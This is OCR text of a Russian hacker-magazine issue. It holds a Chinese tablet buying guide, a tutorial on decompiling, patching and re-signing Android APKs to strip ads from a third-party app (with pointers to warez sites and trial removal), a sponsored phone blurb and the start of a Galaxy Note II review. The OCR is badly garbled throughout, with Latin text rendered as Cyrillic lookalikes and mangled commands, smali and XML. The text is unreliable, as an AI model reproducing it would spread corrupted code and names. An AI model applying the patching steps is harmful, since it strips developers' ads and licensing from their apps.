планшета. Почему они не делают это еще 
на заводе, остается загадкой до сих пор. Ну 
и напоследок — это шлейфы, которые могут 
быть просто неплотно воткнуты в гнезда (про- 
является в темном экране, плохой работе тача 
или фантомных нажатиях). Это легко поправить 
понятно каким способом. Корпус, кстати, хоть 
и хорош, но скрипит при «скручивании». 
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АіпоІЫоѵо 10 Него 



РіРО М3: осмотр с пристрастием 



Воттак выглядит однокристальная система КосксМр РК3066 



Еще одна слабая сторона планшета — это 
отсутствие хороших сторонних прошивок. Нет, 
тут есть модификации стандартной прошивки, 
в которых убраны разные китайские приблуды, 
а маркет обучен видеть больше софта, но АОКР 
и СуаподепМоб, собранных из исходников, пока 
нет (что, скорее всего, является вопросом вре- 
мени). Зато есть обновления от производителя. 
Нечастые, но есть. 



И ЭТО ВСЁ? 



На самом деле рынок китайских планшетов 
практически безграничен. Здесь работает мно- 
жество компаний, оттипичнейших ноунеймов 
до «дорогих» БтагіСІ. В этом обзоре я рас- 
сказал лишь о недорогих моделях, заслужи- 
вающих внимания. Однако, как ты уже понял, 
все эти «китайцы» имеют свои проблемы, так 
что они станут хорошим приобретением, если 
руки у тебя растут из правильного места. Всем 
остальным я бы порекомендовал доплатить 
100 долларов и взять уже более качественного 
«китайца», в котором проблем почти не на- 
блюдается. Но стоит иметь в виду, что в этом 
случае ты можешь получить модель с худшими 
характеристиками, а от брака не застрахован 
никто. 



КИТАЙСКАЯ СПЕЦИФИКА 



В заключение статьи я хотел бы остано- 
виться на особенностях китайского произ- 
водства. Бизнес-модель любой китайской 
компании, предлагающей дешевые продукты 
чуть ли не по цене комплектующих (то есть 
не таких «дорогих» брендов, как МЕІ21І или 
2ТЕ), основывается на двух составляющих: 
дешевой рабочей силе и отсутствии внятного 
тестирования и проработки дизайна. В сущ- 
ности, китайцы просто берут одну из систем 
на кристалле (5оС), приделывают к ней память, 
модули связи, аккумулятор, прикидывают, 
какое для всего этого нужно пространство, 
вычерчивают на основе этих данных корпус 
и пускают все это в производство руками низ- 
кооплачиваемого и низкоквалифицированного 
персонала. 

Результатом такой схемы работы стано- 
вится не только низкая цена, но и продукт, 
который всегда находится в стадии тестирова- 
ния и доработки, но при этом вовсю продается. 
Работает это примерно так: компания выпуска- 
ет первую партию продукта, который быстро 
попадает в руки потребителя, тот, в свою оче- 
редь, находит в ней множество багов и жалу- 
ется на это компании. Руководство последней 



пинает инженеров и сборщиков, указывая им 
на ошибки, и выпускает вторую партию, багов 
в которой уже меньше, но еще достаточно. Про- 
цесс повторяется вновь, и со временем продукт 
доводится до приемлемого состояния. 

Все это, конечно, не свойственно совсем уж 
«подвальным компаниям», которым плевать 
и на баги, и на потребителя, и на самих себя, 
но имеет место быть в случае с реально за- 
регистрированными компаниями, на протя- 
жении лет выпускающими все новые и новые 
продукты. Именно на такие компании следует 
обращать внимание при покупке «китай- 
цев», а также стоит иметь в виду, что, даже 
если первая их модель была полным шлаком, 
десятая уже может быть вполне качествен- 
ным продуктом. Также имеет значение партия 
продукта. Как я уже сказал, со временем товар 
обычно избавляется от недостатков; это приво- 
дит нас к выводу, что брать следует продукцию 
той компании, которая уже давно находится 
на китайском рынке, но при этом не бежать 
за новинками, а выждать несколько месяцев 
(а лучше пол года) перед тем, как продукт будет 
доведен до ума. Следуя этой логике, шансы 
приобрести хорошую вещь за смешные деньги 
резко возрастают, ш 



ОНЛАЙН-МАГАЗИНЫ 



Купить китайский планшет или смартфон можно во многих интернет-магазинах, в том числе российских. Однако следует 
иметь в виду, что многие интернет-магазины не слишком обременяют себя тестированием продуктов перед отправкой и могут 
вести себя наплевательски по отношению к клиентам. Особо стоит отметить российские магазины, большинство из которых 
занимаются тем, что просто перенаправляют заказы в китайские магазины, а разницу в сумме (которая бывает весьма 
существенной) кладут себе в карман. Поэтому от их услуг лучше вообще отказаться в пользу проверенных китайских сторов, 
самые достойные из которых перечислены ниже. 



Ітуаеа І .со т — один из круп- 
нейших магазинов, в котором 
есть почти любая электрони- 
ка. Низкие цены, нотехника 
восновном некачественная. 
Работают быстро, мгно- 
венно реагируют на любые 
претензий, но неутруждают 
себя проверкойтовара перед 
отправкой. Доставка бес- 
платна. 



— специализи- 



руется на продаже смартфо- 
нов, планшетов и аксессуа- 
ров к ним. Цены тоже низкие, 
но может позволить себе 
различные выкрутасы в виде 
задержки ѳ отправлении 
на несколько дней. Товары 
тестируются перед отправ- 
кой, проблем с возвратом нет. 
Доставка бесплатна. 



5 р е п і г. ; 1 . г о г і — по сути, 
аналог последнего мага- 
зина, носболеевысокими 
ценами и лучшим качеством 
обслуживания. Соответ- 
ственно, тут нет и некоторых 
недостатков рапсіаѵѵіІІ: все 
работает быстро и по графи- 
ку, техподдержка адекватная 
и отзывчивая: Доставкатут 
тоже бесплатная. 



аііехргезв-.сот — ближайший 



китайский аналог еЬау.сот, 
площадка для различных 
торговцев. Поэтомуздесь 
тоже можно найти выгодные 
предложения, но нет гаран- 
тий, приходится действовать 
на свой страх и риск. Многие 
продавцы предлагаютбес- 
платную доставку в любую 
точку мира. 



• Китайские 
планшеты 
развиваются так 
быстро, что я не буду 
удивлен, если 
к выходу журнала 
в свет описанные 
в статье модели уже 
устареют. Однако 
это не сделает их 
хуже, а энтузиасты 
уже успеют 
создать множество 
прошивок 
и модификаций 
для них. 
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Х-МОВИЕ 



Роман Ярыженко [готлпапюОуапЬех.ги] 
Евгений Зобнин ІгоЬпіпШдтаіІ.сот) 



АНАТОМИЯ С ПРЕПАРАЦИЕЙ 







ВСКРЫВАЕМ, МОДИФИЦИРУЕМ 
И ЗАПАКОВЫВАЕМ А№КОШ-ПРИЛОЖЕНИЯ 



Иногда некоторые приложения на АпсІгоісІ чем-то не устраивают пользователя. В качестве примера мож- 
но привести назойливую рекламу. А то бывает и так — всем хороша программа, да только перевод в ней 
или кривой, или вовсе отсутствует. Или, например, программа триальная, а получить полную версию 
возможности нет. Как же изменить ситуацию? 



ВВЕДЕНИЕ 



В этой статье мы поговорим о том, как разо- 
брать пакет АРК с приложением, рассмотрим 
его внутреннюю структуру, дизассемблируем 
и декомпилируем байт-код, а также попробуем 
внести в приложения несколько изменений, ко- 
торые могут принести нам ту или иную выгоду. 

Чтобы сделать все это самостоятель- 
но, потребуются хотя бы начальные знания 
языка ^ѵа, на котором пишутся приложения 
для АпсІгоісІ, и языка ХМІ_, который использует- 
ся в АпсІгоісІ повсеместно — от описания само- 
го приложения и его прав доступа до хранения 
строк, которые будут выведены на экран. 



Также понадобится умение обращаться со спе- 
циализированным консольным софтом. 

Итак, что же представляет собой пакет 
АРК, в котором распространяется абсолютно 
весь софт для АпсІгоісІ? 



УСТРОЙСТВО АРК-ПАКЕТОВ 
И ИХ ПОЛУЧЕНИЕ 



Пакет приложения АпсІгоісІ, по сути, явля- 
ется обычным 2ІР-файлом, для просмотра 
содержимого и распаковки которого никаких 
специальных инструментов не требуется. До- 
статочно иметь архиватор — 7-2ір для ѴѴіпсіоѵѵз 
или консольный ипгір в Ыпих. Но это что ка- 



сается обертки. А что внутри? Внутри же у нас 
в общем случае такая структура: 

• МЕТА-ІИР/— содержит цифровой серти- 
фикат приложения, удостоверяющий его 
создателя, и контрольные суммы файлов 
пакета; 

• гез/— различные ресурсы, которые прило- 
жение использует в своей работе, например 
изображения, декларативное описание 
интерфейса, а также другие данные; 

• АпсігоііІМапіІезІ.хтІ — описание при- 
ложения. Сюда входит, например, список 
требуемых разрешений, требуемая версия 
АпсІгоісІ и необходимое разрешение экрана; 
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Анатомия с препарацией 





ІУЯгИІКМ 

• Чтобы подписать 
приложение 

с помощью арк- 
зідпег, ты должен 
установить Апгігоігі 
50К и указать 
полный путь до него 
в настройках 
приложения. 

• Вся информация 
предоставлена 
исключительно 

в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



• сІаБзез.сІех — компилированный байт-код 
приложения для виртуальной машины 
йаіѵік; 

• гезоигсез.агзс— тоже ресурсы, но другого 
рода — в частности, строки (да-да, этотфайл 
можно использовать для русификации!). 

Перечисленные файлы и каталоги есть 
если не во всех, то, пожалуй, в абсолютном 
большинстве АРК. Однако стоит упомянуть 
еще несколько не столь распространенных 
файлов/каталогов: 

• аззеіз — аналогресурсов. Основное от- 
личие — для доступа к ресурсу необходимо 
знать его идентификатор, список аззеГов 
же можно получатьдинамически, используя 
метод А55еіМападег.ІІ5І() в коде приложе- 
ния; 

• ІіЬ — нативные І_іпих-библиотеки, написан- 
ные с помощью МОК (Маііѵе Оеѵеіортепі Кіі). 
Этот каталог используют производители 
игр, помещаятуда движок игры, написанный 
на С/С++, а также создатели высокопро- 
изводительных приложений (например, 
Эоодіе СЬготе). С устройством разобра- 
лись. Но как же получить сам файл пакета 
интересующего приложения? Поскольку 
без рута с устройства забрать файлы АРК 

не представляется возможным (они лежат 
в каталоге/гіаіа/арр), а рутить не всегда 



целесообразно, имеется какминимумтри 
способа получитьфайл приложения на ком- 
пьютер: 

• расширение АРК Ооѵѵпіоасіегдля СЬготе 

( ЬіІ.Іу/АРиОдЬ ): 

• приложение РеаІ АРК 1_еесЬег ( ЬіІ.Іу/ 
ѵКЬНтб ): 

• различныефайлообменники и варезники. 

Какой из них взять на вооружение — дело 
вкуса; мы предпочитаем использовать от- 
дельные приложения, поэтому опишем РеаІ 
АРК І_еесбег, тем более что написан он на Эаѵа 
и, соответственно, работать будет хоть в винде, 
хоть в никсах. 

После запуска программы необходимо 
заполнить три поля: ЕтаіІ, Раззѵѵогсі и Реѵісе 
Ю — и выбрать язык. Первые два — е-таіі 
и пароль твоего гуглоаккаунта, который ты ис- 
пользуешь на устройстве. Третий же является 
идентификатором устройства, и его можно 
получить, набрав на номеронабирателе код 
*#*#8255#*#* и затем найдя строку Оеѵісе 
Ю. При заполнении надо ввести только Ш 
без префикса апсігоісі-. 

После заполнения и сохранения не- 
редко выскакивает сообщение «Еггог ѵѵЫІе 
соппесііпд Іо зегѵег». Оно не имеет отношения 
к боодіе РІау, поэтому смело его игнорируй 
и ищи интересующие тебя пакеты. 



ПРОСМОТР И МОДИФИКАЦИЯ 



Допустим, ты нашел интересующий тебя пакет, 
скачал, распаковал... и при попытке просмо- 
тра какого-нибудь ХМЬфайла с удивлением 
обнаружил, что файл не текстовый. Чем же 
его декомпилировать и как вообще работать 
с пакетами? Неужели необходимо ставить 
5йК? Нет, 50К ставить вовсе не обязательно. 
На самом деле для всех шагов по распаковке, 
модификации и упаковке пакетов АРК нужны 
следующие инструменты: 

• архиватор2ІРдля распаковки изапаковки; 

• зтаіі — ассемблер/дизассемблер байт-кода 
виртуальной машины йаіѵік ( сосіе.доодіе. 
сот/р/зтаіі ): 

• аарі — инструмент для запаковки ресурсов 
(по умолчанию ресурсы хранятся в бинарном 
виде для оптимизации производительности 
приложения). Входит в состав Апсігоісі 5РК, 
но может быть получен и отдельно; 

• зідпег— инструмент для цифровой подписи 
модифицированного пакета (ЬН .1ѵ/Кппгѵ4М ). 

Использовать все эти инструменты можно 
и по отдельности, но это неудобно, поэтому 
лучше воспользоваться более высокоуровне- 
вым софтом, построенным на их основе. Если 
ты работаешь в Ыпих или Мае 05 X, то тут 
есть инструмент под названием аркіооі ( ЬіМѵ/ 
аеПа7 ). Он позволяет распаковывать ресурсы 



ДЕКОМПИЛЯЦИЯ ПРИЛОЖЕНИЙ 



В статье мы работали только с дизассембли- 
рованным кодом приложения, однако если в 
большие приложения вносить более серьез- 
ные изменения, разобраться в коде гтаіі 
будет гораздо сложнее. К счастью, мы можем 
декомпилировать код сіех в Эаѵа-код, который 
будет хоть и не оригинальным и не компи- 
лируемым обратно, но гораздо более легким 
для чтения и понимания логики работы при- 
ложения. Чтобы сделать это, нам понадобятся 
два инструмента: 



• сіех2іаг — транслятор байт-кода Эаіѵік 
в байт-код ЭѴМ, на основе которого мы 
сможем получить код на языке Эаѵа (сосіе. 
доодІе.сот/р/сіех2іаг); 

• ісі-диі — сам декомпилятор, позволяющий 
получить из байт-кода ЭѴМ читаемый код 
Эаѵа ( )‘аѵа.сіесоппріІег.Ггее.Н . В качестве 
альтернативы можно использовать Эасі ( ѵѵѵѵѵѵ. 
ѵагапесказ.сот/іасі ): хоть он и довольно 
старый, но в некоторых случаях генерирует 
более читаемый код, нежели Эсі-диі. 



Использовать их следует так. Сначала 
запускаем сіех2]аг, указывая в качестве 
аргумента путь до арк-пакета: 

% сіех2даг.зН таіі.арк 

В результате предыдущей операции в текущем 
каталоге появится Эаѵа-пакет таіі^аг, который 
уже можно открыть в ]сі-диі для просмотра Эаѵа- 
кода. 
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Х-МОВИЕ 



ТЕОРИЯ — ЭТО, КОНЕЧНО, ХОРОШО, 

НО ЗАЧЕМ ОНА НУЖНА, ЕСЛИ МЫ НЕ ЗНАЕМ, 
ЧТО ДЕЛАТЬ С РАСПАКОВАННЫМ ПАКЕТОМ? 



в оригинальный вид (в том числе бинарные 
ХМІ_- и агзс-файлы), пересобирать пакет с из- 
мененными ресурсами, но не умеет подписы- 
вать пакеты, так что запускать утилиту БІдпег 
придется вручную. Несмотря на то что утилита 
написана на ^ѵа, ее установка достаточно 
нестандартна. Сначала следует получить сам 
Іаг-файл: 

$ ссі /-Стр 

$ м§еТ Ь**р://Ьі1:.1у/МСЗОС2 
$ -Саг -хз’-Р арк-СооІІ.Б.І.-Саг.Ьгг 

Далее нам понадобится скрипт-обвязка 
для запуска аркіооі (он, кстати, доступен 
и для \А/ іпсіо\л/5), включающий в себя еще и ути- 
литу аарі, которая понадобится для запаковки 
пакета: 

$ Н-С*р://Ьіі.1у/МКзЕс7 

$ *аг -х]-Р арк1:оо1-іп5І:а11-1іпих-4^ 

гѲБ-іЬо-С.Іаг.Ьгг 

Далее просто сваливаем содержимое обо- 
их архивов в каталог ~/Ьіп и добавляем его 
в $ Р АТ Н : 

$ тѵ арк-СооІ.даг ~/Ьіп 

$ тѵ арк*оо1-іп5-Са11-1іпих-гѲ5-іЬо*/* ♦-* 

~/Ьіп 

$ ехрогі РАТН=~/Ьіп : $РАТН 



р Приложение Воокіп^.сот 

О 


♦ 






і 









Наш подопытный кролик. Видна реклама 



Если же ты работаешь в ѴѴІпсіоѵѵз, 
то для нее есть превосходный инструмент под 
названием Ѵігіиоиз Теп Зіисііо І ЬЯ-Іѵ/ЦукУЦІ . 
который также аккумулирует в себе все эти 
инструменты (включая сам аркіооі), но вместо 
СП-интерфейса предоставляет пользователю 
интуитивно понятный графический интерфейс, 
с помощью которого можно выполнять опера- 
ции по распаковке, дизассемблированию и де- 
компиляции в несколько кликов. Инструмент 
этот Оопаііоп-ѵѵаге, то есть иногда появляются 
окошки с предложением получить лицензию, 
но это, в конце концов, можно и потерпеть. 
Описывать его не имеет никакого смысла, 
потому что разобраться в интерфейсе можно 
за несколько минут. А вот аркіооі, вследствие 
его консольной природы, следует обсудить 
подробнее. 

Рассмотрим опции аркіооі. Если вкратце, 
то имеются три основные команды: сі (сіесосіе), 

Ь (Ьиіісі] и К (іпБІаІІ {гатеѵѵогк). Если с первыми 
двумя командами все понятно, то что делает 
третья, условный оператор? Она распаковы- 
вает указанный ІД-фреймворк, который не- 
обходим в тех случаях, когда ты препарируешь 
какой-либо системный пакет. 

Рассмотрим наиболее интересные опции 
первой команды: 

• -5 — недизассемблироватьфайлы сіех; 

• -г — не распаковывать ресурсы; 

• -Ь — не вставлятьотладочную информацию 




Он же, но уже без рекламы 



в результаты дизассемблирования файла 
сіех; 

• — ігате-раіЬ — использовать указанный 
111-фреймворк вместо встроенного в аркіооі. 

Теперьрассмотрим паруопций для команды Ь: 

• -і— форсированная сборка без проверки 
изменений; 

• -а— указываем путькаарИсредство 

для сборки АРК-архива), если ты по какой-то 
причине хочешь использовать его из другого 
источника. 

Пользоваться аркіооі очень просто, 
для этого достаточно указать одну из команд 
и путь до АРК, например: 

$ арк*оо1 сі таіі.арк 

После этого в каталоге таіі появятся все 
извлеченные и дизассемблированные файлы 
пакета. 



ПРЕПАРИРОВАНИЕ. ОТКЛЮЧАЕМ 
РЕКЛАМУ 



Теория — это, конечно, хорошо, но зачем 
она нужна, если мы не знаем, что делать с рас- 
пакованным пакетом? Попробуем применить 
теорию с пользой для себя, а именно моди- 
фицируем какую-нибудь софтинутак, чтобы 
она не показывала нам рекламу. Для примера 
пусть это будет ѴИиаІ ТогсЬ — виртуальный 
факел. Для нас эта софтина подойдет идеаль- 
но, потому что она под завязку набита раз- 
дражающей рекламой и к тому же достаточно 
проста, чтобы не потеряться в дебрях кода. 

Итак, с помощью одного из приведенных 
способов скачай приложение из маркета ( Ьіі. 
ІуЛЗШСѴѴС ). Если ты решил использовать 
Ѵігіиоиз Теп Біисііо, просто открой АРК-файл 

ЩттяіЫл 
Ста* ЁТ 

Раи* ог& | 

ОеѵісеЮ: | ~ 

►МпЬ» Ы гесогді (о Ую**: |іО » | 

ОУаЛ Іапдцада/со<**гу: |русс«т (Россия 1 . 

5ап ОрегУог КупЬегк 

СЪооіе ІЫЛи № *аѵа домгіоаОк) аде: 

| Его»*... | 

Оѵхке <Ж«ик ехіЯод Іоідег (о кап ас* ѵаг*юп: 

Вю»к... | 

СЬоом <Ш*Л АЬгмлм (огты. Ы 4о«піо«4 

С {Напалмѣ С {ИепатаНѵасяоп} С Акѵаѵ» а*ЬУсѵе 

АИепЪоп 

* Ет*І агч) Рвііѵѵогс) тМ Ь« 4 У«кхЧ «КУ * а тал вссстлУ л ап 

АгкУ 04гі рЬопв. 

* То оЫап « <Ьѵке ГО, (уре •# , #8255#*#* о» г>«аІ РеѵкеІР аоо оп 
уоигрЬопе. 

* ІТ уои о«*е<1 сЬоояпд МОе*. оасМ арр* »пд арр* (о *с«п 

ноиИ кхУН у (Ье мте <*ге сіогу *УЬ (оУ. 

* СЬесК (Ье деѵіее М 10 Упе* ЬУ<*е сотріап мКу * домпі ѵчогк 

* N«4^ тоге НУр> Рпгі ГМ) деяоп У ЦзйЛйЙ.ог Іеаѵе сопипег* Ьекхп К 
(ог УгсиШпд. 
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ІГШ 

• Так как мы 
подписали пакет 
нашим собственным 
ключом, он будет 
конфликтовать 

с оригинальным 
приложением, 
а это значит, 
что при попытке 
обновить софтину 
через маркет мы 
получим ошибку. 

• Цифровая подпись 
необходима только 
стороннему софту, 
поэтому если 

ты занимаешься 

модификацией 

системных 

приложений, 

которые 

устанавливаются 
копированием 
в каталог /зузіет/ 
арр/, то подписывать 
их не нужно. 

ІѴАУАѴІ 

• Перевод 

приложений Апсігоісі: 
Ы Ыу/ гиѵѵ ЛЛ: 

• пример 
снятия триала 

с приложения: ЬіІ.Іу/ 
Т 067 Ѵ 2 . 



Импорт АРК в Ѵігіиоиз Теп Біисііо 



в приложении и распакуй его, для чего создай 
проект (Рііе — » №\л/ рго)есі), затем в контекст- 
ном меню проекта выбери Ітрогі Рііе. Если 
же твой выбор пал на аркіооі, то достаточно 
выполнить одну команду: 

$ аркіооі сі сот.каи-Р.рагСісІе.^ 
ѵігіиаІТогсЬ.арк 

После этого в каталоге сот.каіЛ.рагІісІе. 
ѵИиаІІогсЬ появится файловое дерево, по- 
хожее на описанное в предыдущем разделе, 
но с дополнительным каталогом зтаіі вместо 
сіех-файлов и файлом аркіооі.уті. Первый 
содержит дизассемблированный код исполня- 
емого сіех-файла приложения, второй — слу- 
жебную информацию, необходимую аркіооі 
для сборки пакета обратно. 

Первое место, куда мы должны загля- 
нуть, — это, конечно же, АпсІгоісІМапііезІ. 
хті. И здесь мы сразу встречаем следующую 
строку: 

<изез-регтІ55іоп апсігоісі :пате=— 

"апсігоісі . регтіззіоп . ШЦМЕТ" /> 

Нетрудно догадаться, что она отвечает 
за предоставление приложению полномочий 
на использование интернет-соединения. 

По сути, если мы хотим просто избавиться 
от рекламы, нам, скорее всего, достаточно 



будет запретить приложению интернет. Попы- 
таемся это сделать. Удаляем указанную строку 
и пробуем собрать софтину с помощью аркіооі: 

$ аркіооі Ь сот.каи-Р.рагігісІе.— 
ѵігТиаІТогсЬ 

В каталоге сот.каиі.рагіісіе.ѵігіиаііогсь/ 
Ьиіісі/ появится результирующий АРК-файл. 
Однако установить его не получится, так 
как он не имеет цифровой подписи и контроль- 
ных сумм файлов (в нем просто нет каталога 
МЕТА-ІІЧР/). Мы должны подписать пакет 
с помощью утилиты арк-зідпег. Запустили. Ин- 
терфейс состоит из двух вкладок — на первой 
(Кеу Сепегаіог) создаем ключи, на второй (АРК 
Бідпег) подписываем. Чтобы создать наш при- 
ватный ключ, заполняем следующие поля: 

• Тагдеі Рііе — выходной файл хранилища 
ключей; в нем обычно хранится одна пара 
ключей; 

• Раззѵѵогсі и СопКгт — пароль для хранили- 
ща; 

• АІіаз — имяключавхранилище; 

• АІіаз раззѵѵогсі и СопНгт — пароль секрет- 
ного ключа; 

• Ѵаіісіііу — срокдействия (вгодах). Значение 
по умолчанию оптимально. 

Остальные поля, в общем-то, необязатель- 
ны — но необходимо заполнить хотя бы одно. 



Теперь этим ключом можно подписать 
АРК. На вкладке АРК Бідпег выбираем только 
что сгенерированный файл, вводим пароль, 
алиас ключа и пароль к нему, затем находим 
файл АРК и смело жмем кнопку «Бідп». Если 
все пройдет нормально, пакет будет подписан. 

После этого скидываем пакет на смартфон, 
устанавливаем и запускаем. Вуаля, рекла- 
ма пропала! Вместо нее, однако, появилось 
сообщение, что у нас нет интернета или 
отсутствуют соответствующие разрешения. 

По идее, этого могло бы и хватить, но сообще- 
ние выглядит раздражающе, да и, если честно, 
нам просто повезло с тупым приложением. 
Нормально написанная софтина, скорее всего, 
уточнит свои полномочия или проверит нали- 
чие интернет-соединения и в противном слу- 
чае просто откажется запускаться. Как быть 
в этом случае? Конечно, править код. 

Обычно авторы приложений создают специ- 
альные классы для вывода рекламы и вы- 
зывают методы этих классов во время запуска 
приложения или одной из его «активностей» 
(упрощенно говоря, экранов приложения). 
Попробуем найти эти классы. Идем в каталог 
зтаіі, далее сот (в огд лежит только открытая 
графическая библиотека сосоз2с1), далее каи{ 
(именно туда, потому что это имя разработчика 
и там лежит весь его код) — и вот он, ката- 
лог тагкеііпд. Внутри находим кучу файлов 
с расширением зтаіі. Это классы, и наиболее 
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примечателен из них класс Асі.зтаіі, по назва- 
нию которого нетрудно догадаться, что именно 
он выводит рекламу. 

Мы могли бы изменить логику его работы, 
но гораздо проще будет тупо убрать вызовы 
любых его методов из самого приложения. 
Поэтому выходим из каталога тагкеііпд 
и идем в соседний каталог рагіісіе, а затем 
в ѵігІиаІІогсЬ. Особого внимания здесь заслу- 
живает файл МаіпАсІіѵіІу.зтаІі. Это стандарт- 
ный для Апсігоісі класс, который создается 
АпсІгоісІ БОК и устанавливается в качестве точ- 
ки входа в приложение (аналог функции таіп 
в Си). Открываем файл на редактирование. 

Внутри находится код зтаіі (местный 
ассемблер). Он довольно запутанный и труд- 
ный для чтения в силу своей низкоуровневой 
природы, поэтому мы не будем его изучать, 
а просто найдем все упоминания класса Ас) 
в коде и закомментируем их. Вбиваем строку 
«Асі» в поиске и попадаем на строку 25: 



.беісі ргіѵаТе асі : Ісот/каи-Р/тагке1іп§/АсІ; 

Здесь создается поле ас) для хранения 
объекта класса Ас). Комментируем с помощью 
установки знака # перед строкой. Продолжаем 
поиск. Строка 423: 

пем-іпзіапсе ѵЗ, Ісот/каи-Р/тагкеііпб/АсІ; 

Здесь происходит создание объекта. 
Комментируем. Продолжаем поиск и находим 
в строках 433, 435, 466, 468, 738, 740, 800 и 802 
обращения к методам класса Ас). Коммен- 
тируем. Вроде все. Сохраняем. Теперь пакет 
необходимо собрать обратно и проверить 
его работоспособность и наличие рекламы. 
Для чистоты эксперимента возвращаем 
удаленную из АпгігоісІМапіІезІ.хтІ строку, со- 
бираем пакет, подписываем и устанавливаем. 



Оп-па! Реклама пропала только во время 
работы приложения, но осталась в главном 
меню, которое мы видим, когда запускаем 
софтину. Так, подождите, но ведь точка вхо- 
да — это класс МаіпАсІіѵіІу, а реклама пропала 
во время работы приложения, но осталась 
в главном меню, значит, точка входа другая? 
Чтобы выявить истинную точку входа, вновь 
открываем файл АпсІгоісІМапііезІ.хтІ. И да, 
в нем есть следующие строки: 

сасііѵіТу апсігоісі : 1аЬе1="@5Т:гіп2/арр_-' 
пате" апсігоіс) : пате=" .БТагТ" апс)гоіс):«-< 
5сгееп0гіепіа1:іоп="рогТгаіТ:"> 
сіпіепТ-бІТео 

<асііоп апсігоісі :пате=" апсігоісі.*-' 
іпТепі.асііоп.МАІМ" /> 

<саіе§огу апсігоісі : пате="апсІгоісІ 
іпіепі.са1:е§огу . І.АІЖНЕК" /> 
</іпіепТ-б1Тег> 

</асТіѵіТу> 

Они говорят нам (и, что важнее, андроиду) 
о том, что активность с именем Біагі должна 
быть запущена в ответ на генерацию интента 
(события) апгігоігі.іпІепІ.асІіоп.МАІЫ из ка- 
тегории апс)гоі().іпІеп1.саІедогу.І_АІІМСНЕР. 
Это событие генерируется при тапе на иконку 
приложения в ланчере, поэтому оно и опре- 
деляетточку входа, а именно класс Біагі. 
Скорее всего, программист сначала напи- 
сал приложение без главного меню, точкой 
входа в которое был стандартный класс 
МаіпАсІіѵіІу, а затем добавил новое окно 
(активность), содержащее меню и описанное 
в классе Біагі, и вручную сделал его точкой 
входа. 

Открываем файл Біагі.зтаіі и вновь ищем 
строку «Ас)», находим в строках 153 и 155 
упоминание класса РігзіАс). Он тоже есть в ис- 
ходниках и, судя по названию, как раз и отве- 
чает за показ объявлений на главном экране. 



Смотрим дальше, идет создание экземпляра 
класса РігзіАс) и интента, по контексту имею- 
щего отношение к этому экземпляру, а дальше 
метка сопсМО, условный переход на которую 
осуществляется аккурат перед созданием 
экземпляра класса: 

і-Р-пе рі, ѵѲ, :сопс)_10 
Ліпе 74 

пеи-іпзТапсе ѵѲ, І.апсІгоісІ/сопіепі:/*-' 
ІпіепТ; 

:сопсІ_10 

Скорее всего, программа каким-то случай- 
ном образом вычисляет, нужно ли показывать 
рекламу на главном экране, и, если нет, пере- 
скакивает сразу на сопсМО. ОК, упростим ей 
задачу и заменим условный переход на без- 
условный: 

#іТ-пе рі, ѵ0, :сопс)_10 
боіо :сопс)_10 

Больше упоминаний РігбіАсі в коде нет, по- 
этому закрываем файл и вновь собираем наш 
виртуальный факел с помощью аркіооі. Копи- 
руем на смартфон, устанавливаем, запускаем. 
Вуаля, вся реклама исчезла, с чем нас всех 
и поздравляем. 



ИТОГИ 



Эта статья лишь краткое введение в ме- 
тоды вскрытия и модификации Апбгоісі- 
приложений. За кадром остались многие 
вопросы, такие как снятие защиты, разбор 
обфусцированного кода, перевод и замена 
ресурсов приложения, а также модификация 
приложений, написанных с использованием 
Апсігоісі МОК. Однако, имея базовые знания, 
разобраться во всем этом — лишь вопрос 
времени. зс 
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СОВЕТ № 1: СМАРТФОН ДЛЯ РАЗРАБОТЧИКА 




Благодаря мощному четырехъядерному 
процессору йиаісотт Бпарсігадоп™ 
АР08064 (поколение 54 Кгаіі) смарт- 
фон Оріітиз б отлично подойдет для 
тестирования приложений и игр — 
у аппарата большой запас прочности. 
Помимо мощного процессора, смартфон 
может похвастаться двумя гигабайтами 
оперативной памяти и очень мощным ви- 
деоускорителем Асігепо 320. К слову, в те- 
сте 61_ВепсЬтагк этот ускоритель почти 
в три раза превосходит МѴЮІА Тедга 3. 

Кроме того, благодаря поддержке 
1)5В Нозі, ЫЕС и ВІиеІооіЬ на аппарате 
возможно тестировать работу с различ- 
ной периферией, что удобно для драй- 
верописателей. И наконец, Апсігоісі 4 




отличается прекрасной поддержкой 
внешних устройств — от клавиатур 
и флеш-накопителей до джойстиков 
и геймпадов. 

Отметим также, что для эффективной 
работы в смартфоне предусмотрен на- 
бор фирменных функций и приложений. 
Функция ОБІісІе позволяет одновременно 
работать с двумя приложениями, а І_іѵе 
2оотІпд — увеличивать участок видео 
в плеере. Также интересна технология 
ОиаІ 5сгеепД)иаІ РІау, совместимая с 
любым устройством, поддерживающим 
стандарт передачи данных Мігасазі, 
например телевизором или специальным 
адаптером, позволяющим использовать 
его в связке с проектором. 
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РАССУЖДАЕМ О СУДЬБАХ ОГРОМ- 
НЫХ СМАРТФОНОВ НА ПРИМЕРЕ 
5АМ51Ж6 ОМАХУ ЫОТЕ II 



Александр Расмус (газтизйгеаі.хакер.ги) 



Х-МОВІЫЕ 



Благодаря Затаипд телефонов с дисплеем от пяти дюймов 
становится все больше, но споры по поводу этого форм-фактора 
не утихают на протяжении всего последнего года. Попробуем 
разобраться, что изменилось за это время, а заодно и посмо- 
трим, чем Затвипд нашпиговала свой самый дорогой смартфон. 



СПЕЦИАЛИСТ ШИРОКОГО ПРОФИЛЯ 



В каком-то смысле суперфоны вроде Батзипд 
Баіаху ІМоІе II можно сравнить с 17-дюймовыми 
ноутбуками: над их владельцами можно из- 
деваться почти бесконечно, но очевидно и то, 
что «если звезды зажигают — значит — это 
кому-нибудь нужно». Если посмотреть обзоры 
первого баіаху ІМоІе, то большинство едино- 
гласно раскритиковали размер. Однако за ме- 
сяц до запуска второй модели корейский про- 
изводитель поразил всех, объявив, что баіаху 
Моіе был продан тиражом в 10 миллионов. 

И туту многих комментаторов случился 
разрыв шаблона — очевидно, что они чего-то 
не понимают. С цифрами ведь не поспоришь. 

И главное — на улице действительно можно 
увидеть немало людей с пальцами, как у Джи- 
ми Хендрикса, нежно обнимающими гаджет 
более чем компенсирующих размеров. Они 
существуют. Они повсюду. Можно подойти 
и спросить, как же так получилось. Не понять 
и уйти. А что еще остается делать? 

Я не могу для себя объяснить, почему это 
может быть удобно. Я не знаю, зачем бы мне 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



Чипсет: Ехупо$ 4412 Оиагі, 1.6 ГГц, четыре ядра 
ОЗУ: 2 Гб 

